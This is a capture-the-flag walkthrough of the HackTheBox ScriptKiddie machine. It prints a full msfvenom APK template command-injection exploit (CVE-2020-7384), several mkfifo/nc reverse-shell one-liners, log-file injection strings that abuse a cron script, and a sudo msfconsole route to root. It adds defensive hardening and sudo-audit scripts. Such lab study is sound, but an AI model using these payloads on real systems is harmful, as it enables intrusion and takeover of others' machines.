HackTheBox - ScriptKiddie - Retired
Recon
As usual I started off with a threader3000 scan of the IP address.
It shows two ports open: 22 and 5000.
Using threader to launch nmap on just those ports comes back with these results.
Nmap scan report for 10.10.10.226
Host is up (0.060s latency).

PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   3072 3c:65:6b:c2:df:b9:9d:62:74:27:a7:b8:a9:d3:25:2c (RSA)
|   256 b9:a1:78:5d:3c:1b:25:e0:3c:ef:67:8d:71:d3:a3:ec (ECDSA)
|_  256 8b:cf:41:82:c6:ac:ef:91:80:37:7c:c9:45:11:e8:43 (ED25519)
5000/tcp open  http    Werkzeug httpd 0.16.1 (Python 3.8.5)
|_http-title: k1d'5 h4ck3r t00l5
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 9.09 seconds
------------------------------------------------------------
Combined scan completed in 0:01:43.278542
Let's check out port 5000
Looks like a page that can query searchsploit, run nmap scans and generate msfvenom payloads.
I tried playing with the nmap and searchsploit functions to see if I could insert some other code to run commands on the box, without success. So let's pivot to the payloads function.
I've never used a template to make an msfvenom payload before, so that is intriguing.
Just a quick Google search for "msfvenom template" and we see this interesting result.
https://www.exploit-db.com/exploits/49491
Here is a good writeup about the nuts and bolts of this RCE.
https://github.com/justinsteven/advisories/blob/master/2020_metasploit_msfvenom_apk_template_cmdi.md
Looks like this is a Python script that builds a malicious APK template file: the command to run is hidden in the -dname of the certificate used to sign the APK, and msfvenom executes it when it processes that APK as a template.
# Exploit Title: Metasploit Framework 6.0.11 - msfvenom APK template command injection
# Exploit Author: Justin Steven
# Vendor Homepage: https://www.metasploit.com/
# Software Link: https://www.metasploit.com/
# Version: Metasploit Framework 6.0.11 and Metasploit Pro 4.18.0
# CVE : CVE-2020-7384

#!/usr/bin/env python3
import subprocess
import tempfile
import os
from base64 import b64encode

# Change me
payload = 'echo "Code execution as $(id)" > /tmp/win'

# b64encode to avoid badchars (keytool is picky)
payload_b64 = b64encode(payload.encode()).decode()
dname = f"CN='|echo {payload_b64} | base64 -d | sh #"

print(f"[+] Manufacturing evil apkfile")
print(f"Payload: {payload}")
print(f"-dname: {dname}")
print()

tmpdir = tempfile.mkdtemp()
apk_file = os.path.join(tmpdir, "evil.apk")
empty_file = os.path.join(tmpdir, "empty")
keystore_file = os.path.join(tmpdir, "signing.keystore")
storepass = keypass = "password"
key_alias = "signing.key"

# Touch empty_file
open(empty_file, "w").close()

# Create apk_file
subprocess.check_call(["zip", "-j", apk_file, empty_file])

# Generate signing key with malicious -dname
subprocess.check_call(["keytool", "-genkey", "-keystore", keystore_file, "-alias", key_alias,
                       "-storepass", storepass, "-keypass", keypass, "-keyalg", "RSA",
                       "-keysize", "2048", "-dname", dname])

# Sign APK using our malicious dname
subprocess.check_call(["jarsigner", "-sigalg", "SHA1withRSA", "-digestalg", "SHA1",
                       "-keystore", keystore_file, "-storepass", storepass, "-keypass", keypass,
                       apk_file, key_alias])

print()
print(f"[+] Done! apkfile is at {apk_file}")
print(f"Do: msfvenom -x {apk_file} -p android/meterpreter/reverse_tcp LHOST=127.0.0.1 LPORT=4444 -o /dev/null")
Let's see if we can get this to work.
Exploit
First, just as a POC, I'm going to try to have the box ping my VPN IP of 10.10.14.2
An error about no jarsigner… because Kali doesn't ship with the JDK… let's install that
sudo apt install -y default-jdk
You might also notice that my VPN IP address changed after this, so I modified the script again.
Then generate the APK payload
Now we need to change the options for msfvenom on the website to Android so we can upload this APK. We can put anything we want for the IP address.
Then browse to the APK… But before we do this, let's set up a tcpdump listener to see if we do get pings back.
sudo tcpdump -i tun0 -n icmp
That listens on the VPN (tun0) interface and only shows ICMP packets (-n skips name resolution).
Now if we click generate.
We get pings back, so we have a working POC (proof of concept) for this exploit.
Now let's modify it to get back a shell instead.
This step took me a couple of minutes; I couldn't get the standard nc or mkfifo shell to work…
So I made an APK to grab the passwd file.
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
systemd-timesync:x:102:104:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:103:106::/nonexistent:/usr/sbin/nologin
syslog:x:104:110::/home/syslog:/usr/sbin/nologin
_apt:x:105:65534::/nonexistent:/usr/sbin/nologin
tss:x:106:111:TPM software stack,,,:/var/lib/tpm:/bin/false
uuidd:x:107:112::/run/uuidd:/usr/sbin/nologin
tcpdump:x:108:113::/nonexistent:/usr/sbin/nologin
landscape:x:109:115::/var/lib/landscape:/usr/sbin/nologin
pollinate:x:110:1::/var/cache/pollinate:/bin/false
sshd:x:111:65534::/run/sshd:/usr/sbin/nologin
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
lxd:x:998:100::/var/snap/lxd/common/lxd:/bin/false
kid:x:1000:1000:kid:/home/kid:/bin/bash
pwn:x:1001:1001::/home/pwn:/bin/bash
I noticed the users were set up to use /bin/bash and not /bin/sh (which is what I was trying with my reverse shells).
I modified the last one I was working with, mkfifo
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc 10.10.14.14 5555 >/tmp/f
Made the apk, uploaded it and…….
We got our foothold shell!!
For grins and giggles I looked at the kid's Python for the site.
There is a regex filter that only allows an IP address in the nmap function,
and a regex filter that only allows alphanumeric input in the searchsploit function.
regex_ip = re.compile(r'^(?:(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.){3}(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)$')
regex_alphanum = re.compile(r'^[A-Za-z0-9 \.]+$')
That little scamp.
He is also writing out failed attempts to a log file, but only in the searchsploit function.
def searchsploit(text, srcip):
    if regex_alphanum.match(text):
        result = subprocess.check_output(['searchsploit', '--color', text])
        return render_template('index.html', searchsploit=result.decode('UTF-8', 'ignore'))
    else:
        with open('/home/kid/logs/hackers', 'a') as f:
            f.write(f'[{datetime.datetime.now()}] {srcip}\n')
        return render_template('index.html', sserror="stop hacking me - well hack you back")
But that log file is empty.
Poking around /home there is another user named pwn whose directory we have some access to.
There is a file named scanlosers.sh
cat ./scanlosers.sh
#!/bin/bash

log=/home/kid/logs/hackers

cd /home/pwn/
cat $log | cut -d' ' -f3- | sort -u | while read ip; do
    sh -c "nmap --top-ports 10 -oN recon/${ip}.nmap ${ip} 2>&1 >/dev/null" &
done

if [[ $(wc -l < $log) -gt 0 ]]; then echo -n > $log; fi
Looks like it reads from that log and runs an nmap scan against the people who made their way into it :)
It's a weird setup though… a script running from /home/pwn that reads a log file in /home/kid.
I wonder if there is a cron job that runs that script to "AutoPWN" the "hackers".
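To make the root cause concrete, here is a hardened rewrite of the scanlosers.sh logic shown above. It is an added example written for this post, not the file found on the box. The two changes that close the injection are: every target pulled from the hackers log must match the site's own regex_ip pattern (the Python-only (?:...) groups are turned into plain ERE groups), and nmap gets its arguments as an argv list rather than being interpolated into an sh -c string. The sample log, the make_sample_log helper and the log line "1 2 ;id circusmonkey" are constructed for the demo.

```shell
#!/bin/sh
# Hardened rewrite of the scanlosers.sh logic from this post. Added example,
# not the file found on the box. Two changes close the injection: every target
# pulled from the hackers log must match the site's own regex_ip pattern (the
# (?:...) groups become plain ERE groups), and nmap receives its arguments as
# an argv list instead of being interpolated into an `sh -c` string.

IPV4_RE='^((25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.){3}(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)$'

# Print one validated, de-duplicated IPv4 target per line from a hackers-log
# file. The Flask code writes "[<date> <time>] <srcip>", so the target is the
# third space-separated field, exactly what cut -d' ' -f3- relied on; unlike
# cut, a fourth field or a non-address third field rejects the whole line.
extract_targets() {
    while read -r _date _time ip rest; do
        if [ -n "$rest" ] || ! printf '%s\n' "$ip" | grep -Eq "$IPV4_RE"; then
            printf 'scanlosers: rejected log line: %s %s %s %s\n' \
                "$_date" "$_time" "$ip" "$rest" >&2
            continue
        fi
        printf '%s\n' "$ip"
    done < "$1" | sort -u
}

# Scan every validated target. The scanner command comes from the caller
# (normally: run_scans /home/kid/logs/hackers nmap), so the pipeline can be
# exercised with a harmless stand-in such as echo.
run_scans() {
    logfile=$1
    shift
    extract_targets "$logfile" | while read -r ip; do
        "$@" --top-ports 10 -oN "recon/${ip}.nmap" "$ip"
    done
}

# Constructed sample log (not from the box): one genuine entry, an injected
# line in the shape the post describes, a target with trailing shell text,
# a second host, and a duplicate of the genuine entry.
make_sample_log() {
    f=$(mktemp)
    cat > "$f" <<'EOF'
[2021-02-06 10:11:12.123456] 10.10.14.14
1 2 ;id circusmonkey
[2021-02-06 10:11:13.000000] 10.10.14.14;id
[2021-02-06 10:11:14.000000] 10.10.14.15
[2021-02-06 10:11:15.000000] 10.10.14.14
EOF
    printf '%s\n' "$f"
}

demo=$(make_sample_log)
run_scans "$demo" echo
rm -f "$demo"
```

Run stand-alone it prints the two argv lines that would have been handed to nmap (only 10.10.14.14 and 10.10.14.15 survive) and reports the injected and malformed lines on stderr. The truncation step from the original script is left out here; it is unaffected by the fix.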
What happens if you put something in that empty file? Let's start again with a POC of a ping to see if we can get it working.
We need to be careful here. To inject exactly where we want, we need to pay close attention to this part of the scanlosers.sh file:
cut -d' ' -f3-
We want our injection to land in the third space-delimited field (and everything after it).
Let's make a file called POC to play with, to make sure we get this right.
Let's run the exact cut command on our file to see if it grabs the EVILCODE part.
Great, so we know we need to put our command behind a couple of values separated by spaces.
So something like this:
echo "1 2 ;/bin/bash -c 'ping -c 4 10.10.14.14'" >> /home/kid/logs/hackers
Let's run tcpdump again to make sure we can see the pings coming in.
And we can see we did get our pings back.
Now we should be able to just modify our POC to use a reverse shell.
Let's start an nc listener on port 4444.
Since the mkfifo reverse shell worked for the initial connection, let's use it again and just change the port number.
echo "1 2 ;/bin/bash -c 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc 10.10.14.14 4444 >/tmp/f'" >> /home/kid/logs/hackers
and
We caught a shell
But it's a broken shell and doesn't do anything. I wonder if it has something to do with the field not being delimited with a space at the end? Let's just try adding a couple of spaces to the end of our command before we write it to the file.
echo "1 2 ;/bin/bash -c 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc 10.10.14.14 4444 >/tmp/f' " >> /home/kid/logs/hackers
Same thing. Maybe there needs to be another character there to denote another field?
echo "1 2 ;/bin/bash -c 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc 10.10.14.14 4444 >/tmp/f' circusmonkey" >> /home/kid/logs/hackers
This finally got back a good working shell!
One of the first things to check when doing privilege escalation after landing as a new user is their sudo permissions.
pwn can run msfconsole as root with no root password needed.
I don't know if you know this… but I'm going to drop a little knowledge here… you can run any Linux command from the msfconsole as the user it runs as: id, ifconfig, chmod… literally anything you want to.
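The defender's takeaway from this step is that a NOPASSWD sudo rule for a tool with a built-in command passthrough is the same as granting a root shell. The following script, an added example rather than anything from the box, audits sudoers-style rule lines for that pattern. The SHELL_CAPABLE list is an assumption and is not exhaustive: msfconsole is on it because of the command passthrough described above, the rest are well-known editors, pagers and interpreters with shell escapes. The sample rules (including the /usr/bin/msfconsole path) are constructed; the box's real sudoers entry is not reproduced in this post.

```shell
#!/bin/sh
# Audit sudoers-style rules for the pattern this post abuses: a NOPASSWD entry
# whose command can hand the caller arbitrary command execution. Added example,
# not tooling from the box. SHELL_CAPABLE is an assumption, not an exhaustive
# list: msfconsole is on it because of the command passthrough described above,
# the others are the usual editors, pagers and interpreters with shell escapes.

SHELL_CAPABLE='msfconsole bash sh dash zsh vi vim nano less more man find awk perl python python3 ruby'

# Succeed if any command read from stdin (one "path [args]" per line) has a
# basename in SHELL_CAPABLE.
has_shell_capable() {
    while read -r cmd _args; do
        base=${cmd##*/}
        for b in $SHELL_CAPABLE; do
            [ "$base" = "$b" ] && return 0
        done
    done
    return 1
}

# Read sudoers-style rule lines on stdin and print those that are NOPASSWD and
# grant at least one shell-capable command (a rule may list several, comma-separated).
flag_risky_sudo_rules() {
    while IFS= read -r line; do
        case "$line" in
            ''|\#*) continue ;;
            *NOPASSWD:*) ;;
            *) continue ;;
        esac
        if printf '%s\n' "${line##*NOPASSWD:}" | tr ',' '\n' | has_shell_capable; then
            printf '%s\n' "$line"
        fi
    done
}

# Constructed sample rules (not the sudoers from the box).
sample_rules() {
    cat <<'EOF'
# constructed sample
root ALL=(ALL:ALL) ALL
pwn ALL=(root) NOPASSWD: /usr/bin/msfconsole
kid ALL=(root) NOPASSWD: /usr/bin/apt-get update, /usr/bin/systemctl restart nginx
ops ALL=(root) NOPASSWD: /usr/bin/systemctl status, /usr/bin/less /var/log/syslog
backup ALL=(root) /usr/bin/vim
EOF
}

sample_rules | flag_risky_sudo_rules
```

Run as-is it flags the pwn and ops rules only: the backup rule still requires a password, and the kid rule grants commands without a shell escape. To audit a real host, feed it the output of sudo -l for each account or the contents of /etc/sudoers and /etc/sudoers.d/*.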
We can simply cat out our flag from here
But just reading a flag isn't good enough… We want to completely own this box.
It's pretty trivial at this point; we can use mkfifo again from the msfconsole to land another reverse shell with nc.
Start another listener.
Then drop a new mkfifo in the msfconsole:
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc 10.10.14.14 5566 >/tmp/f
And we are in as root with full access…